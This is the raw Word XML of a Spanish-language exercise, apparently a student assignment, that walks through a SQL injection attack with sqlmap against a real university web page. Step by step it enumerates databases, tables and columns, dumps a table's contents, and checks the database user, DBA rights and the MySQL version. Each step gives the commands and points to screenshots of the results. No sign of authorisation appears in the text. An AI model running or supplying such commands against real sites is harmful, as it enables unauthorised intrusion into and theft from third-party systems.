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15C5" w:rsidRDefault="00D715C5" w:rsidP="00D715C5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Proof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D715C5" w:rsidRDefault="00D715C5" w:rsidP="00D715C5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D715C5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
        <w:t>1)Extraer</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D715C5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> la base de datos :</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Primero la dirección a atacar será esta “</w:t>
      </w:r>
      <w:r w:rsidRPr="00D715C5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>http://www.unal.edu.co/diracad/Unidad_Administrativa/encuestaSatisfaccion.php?pre=1 •</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D715C5" w:rsidRDefault="00D715C5" w:rsidP="00D715C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esto, el comando de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> a utilizar será el siguiente, (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> –u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http://www.unal.edu.co/diracad/Unidad_Administrativa/encuestaSatisfaccion.php?pre=</w:t>
      </w:r>
      <w:proofErr w:type="gram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</w:t>
      </w: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 </w:t>
      </w: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)</w:t>
      </w:r>
      <w:proofErr w:type="gram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</w:rPr>
        <w:t xml:space="preserve">aplicar el resultado sería el siguiente: </w:t>
      </w:r>
      <w:r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  <w:lang w:eastAsia="es-CO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5612130" cy="3632835"/>
            <wp:effectExtent l="0" t="0" r="7620" b="5715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traer la base de dato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C5" w:rsidRDefault="00D715C5" w:rsidP="00D715C5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="bot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  <w:lang w:eastAsia="es-CO"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5612130" cy="3647440"/>
            <wp:effectExtent l="0" t="0" r="762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traer la base de datos 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147" w:rsidRDefault="00D715C5" w:rsidP="00D715C5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="bot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Luego de averiguar las bases de datos disponibles, miramos en alguna de ellas (en este caso escogeré la base de datos “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webces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”), miramos las tablas que posee dicha base de datos con</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA2147" w:rsidRDefault="00EA2147" w:rsidP="00D715C5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="bot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Con el comando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sqlmap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–u y la dirección </w:t>
      </w:r>
      <w:proofErr w:type="gram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siguiente :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00EA2147" w:rsidRDefault="00EA2147" w:rsidP="00D715C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</w:pPr>
      <w:r w:rsidRPr="00EA2147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</w:t>
      </w:r>
      <w:r w:rsidR="00D715C5" w:rsidRPr="00EA2147">
        <w:rPr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>http://www.unal.edu.co/diracad/Unidad_Administrativa/encuestaSatisfaccion.php?pre=1</w:t>
      </w:r>
      <w:r w:rsidR="00D715C5"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> </w:t>
      </w:r>
      <w:r w:rsidR="00D715C5"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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA2147" w:rsidRPr="00EA2147" w:rsidRDefault="00EA2147" w:rsidP="00D715C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proofErr w:type="spellStart"/>
      <w:r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Ademas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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de esto le añadimos lo siguiente en el </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r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final :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00D715C5" w:rsidRDefault="00D715C5" w:rsidP="00D715C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-D </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r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webces</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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–</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EA2147"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tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EA2147"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(Consulta la base de datos y las tablas).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E18B5" w:rsidRDefault="008E18B5" w:rsidP="00D715C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La siguiente imagen muestra la búsqueda del </w:t>
      </w:r>
      <w:proofErr w:type="gram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resultado :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="008E18B5" w:rsidRDefault="008E18B5" w:rsidP="00D715C5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="bot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  <w:lang w:eastAsia="es-CO"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5612130" cy="3670300"/>
            <wp:effectExtent l="0" t="0" r="7620" b="635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a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B5" w:rsidRPr="00EA2147" w:rsidRDefault="008E18B5" w:rsidP="00D715C5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="bot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Luego de esto, ya tenemos numeradas las tablas, habría que entrar en alguna de ellas para saber las columnas y filas que posee.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Apoyandose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en el código anterior que </w:t>
      </w:r>
      <w:proofErr w:type="gram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tenemos :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="008E18B5" w:rsidRDefault="008E18B5" w:rsidP="008E18B5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="bot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Con el comando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sqlmap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–u y la dirección </w:t>
      </w:r>
      <w:proofErr w:type="gram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siguiente :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="008E18B5" w:rsidRPr="008E18B5" w:rsidRDefault="008E18B5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A2147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</w:t>
      </w:r>
      <w:r w:rsidRPr="008E18B5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http://www.unal.edu.co/diracad/Unidad_Administrativa/encuestaSatisfaccion.php?pre=1</w:t>
      </w:r>
      <w:r w:rsidRPr="008E18B5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  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E18B5" w:rsidRDefault="008E18B5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Consultar las </w:t>
      </w:r>
      <w:proofErr w:type="gram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tablas :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="008E18B5" w:rsidRDefault="008E18B5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-D </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r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webces</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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–</w:t>
      </w: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t</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA2147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(Consulta la base de datos y las tablas).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E18B5" w:rsidRDefault="008E18B5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Consultar las </w:t>
      </w:r>
      <w:proofErr w:type="gram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columnas :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="008E18B5" w:rsidRDefault="001A3ECF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Cm2_proyectos --</w:t>
      </w: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columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="008E18B5" w:rsidRDefault="008E18B5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La siguiente imagen muestra la búsqueda del </w:t>
      </w:r>
      <w:proofErr w:type="gram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resultado :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="001A3ECF" w:rsidRDefault="001A3ECF" w:rsidP="008E18B5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/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  <w:lang w:eastAsia="es-CO"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00364002" w:rsidRDefault="00364002" w:rsidP="008E18B5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/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  <w:lang w:eastAsia="es-CO"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001A3ECF" w:rsidRDefault="001A3ECF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  <w:lang w:eastAsia="es-CO"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5612130" cy="2803525"/>
            <wp:effectExtent l="0" t="0" r="7620" b="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umna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02" w:rsidRDefault="00364002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Ahora solo falta acceder alguna de las tablas </w:t>
      </w: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disponibles</w:t>
      </w:r>
      <w:proofErr w:type="gram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,en</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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este caso </w:t>
      </w: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accedi</w:t>
      </w:r>
      <w:proofErr w:type="spell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a la tabla cm2_colores con el contenido que posee, Para esto utilizamos el siguiente código: (Cabe aclarar que la tabla cm2_proyectos no </w:t>
      </w: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tenia</w:t>
      </w:r>
      <w:proofErr w:type="spell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ningún dato, </w:t>
      </w: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asi</w:t>
      </w:r>
      <w:proofErr w:type="spell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que decir hacerlo en general para las tablas)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00364002" w:rsidRDefault="00364002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Sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spell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–u</w:t>
      </w:r>
      <w:r w:rsidRPr="00364002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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00364002" w:rsidRPr="00364002" w:rsidRDefault="00364002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</w:pPr>
      <w:r w:rsidRPr="00364002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 xml:space="preserve">“http://www.unal.edu.co/diracad/Unidad_Administrativa/encuestaSatisfaccion.php?pre=1 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00364002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>“ -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00364002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 xml:space="preserve">D </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00364002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>webces</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00364002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 xml:space="preserve"> -t </w:t>
      </w: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>cms2_colors --columns --drop</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00364002" w:rsidRPr="00364002" w:rsidRDefault="00364002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</w:pPr>
    </w:p>
    <w:p w:rsidR="00364002" w:rsidRDefault="00364002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  <w:lang w:eastAsia="es-CO"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5612130" cy="3915410"/>
            <wp:effectExtent l="0" t="0" r="7620" b="889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 de la tabl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D8D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Para la extracción </w:t>
      </w:r>
      <w:r w:rsidR="004F600F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del usuario de la base de datos</w:t>
      </w:r>
      <w:r w:rsidR="00475D8D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, el formato es el </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00475D8D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siguiente :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00475D8D" w:rsidRDefault="00475D8D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Sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spell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–u “</w:t>
      </w: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dir</w:t>
      </w:r>
      <w:proofErr w:type="spell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” –</w:t>
      </w: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current-</w:t>
      </w:r>
      <w:r w:rsidR="004F600F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user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00475D8D" w:rsidRDefault="00475D8D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El resultado es el </w:t>
      </w:r>
      <w:proofErr w:type="gram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siguiente :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00475D8D" w:rsidRDefault="00475D8D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  <w:lang w:eastAsia="es-CO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5612130" cy="3155315"/>
            <wp:effectExtent l="0" t="0" r="7620" b="6985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 db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8D" w:rsidRDefault="004F600F" w:rsidP="008E18B5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/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</w:pP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t xml:space="preserve">Luego es averiguar si el usuario es </w:t>
      </w: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dba</w:t>
      </w:r>
      <w:proofErr w:type="spell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, es decir si es el administrador de la base de datos, Al código le agregamos lo siguiente, </w:t>
      </w:r>
      <w:r w:rsidRPr="004F600F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>--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F600F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>is-dba</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F600F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 xml:space="preserve"> –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F600F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>current</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F600F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>-d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F600F" w:rsidRDefault="004F600F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  <w:lang w:eastAsia="es-CO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5612130" cy="3556000"/>
            <wp:effectExtent l="0" t="0" r="7620" b="635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0F" w:rsidRDefault="004F600F" w:rsidP="008E18B5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both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Para la </w:t>
      </w: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ultima</w:t>
      </w:r>
      <w:proofErr w:type="spell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parte es averiguar </w:t>
      </w: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cual</w:t>
      </w:r>
      <w:proofErr w:type="spell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es el motor de la base de datos, es el mismo </w:t>
      </w:r>
      <w:proofErr w:type="gram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código :</w:t>
      </w:r>
      <w:proofErr w:type="gram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--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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current-db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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, según este comando se utiliza MYSQL 5.0.12</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00D715C5" w:rsidRPr="00EA2147" w:rsidRDefault="00D715C5" w:rsidP="00D715C5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D715C5" w:rsidRPr="00EA2147" w:rsidRDefault="00D715C5" w:rsidP="00D715C5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00D715C5" w:rsidRPr="00EA21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15C5"/>
    <w:rsid w:val="001A3ECF"/>
    <w:rsid w:val="00364002"/>
    <w:rsid w:val="00475D8D"/>
    <w:rsid w:val="004F600F"/>
    <w:rsid w:val="008E18B5"/>
    <w:rsid w:val="00D715C5"/>
    <w:rsid w:val="00EA2147"/>
    <w:rsid w:val="00F46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715C5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D715C5"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Textodeglobo">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="TextodegloboCar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D715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15C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715C5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D715C5"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Textodeglobo">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="TextodegloboCar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D715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15C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6</Pages>
  <Words>344</Words>
  <Characters>1897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2237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4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-04-27T17:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-04-27T19:10:00Z</dcterms:modified>
</cp:coreProperties>
</file>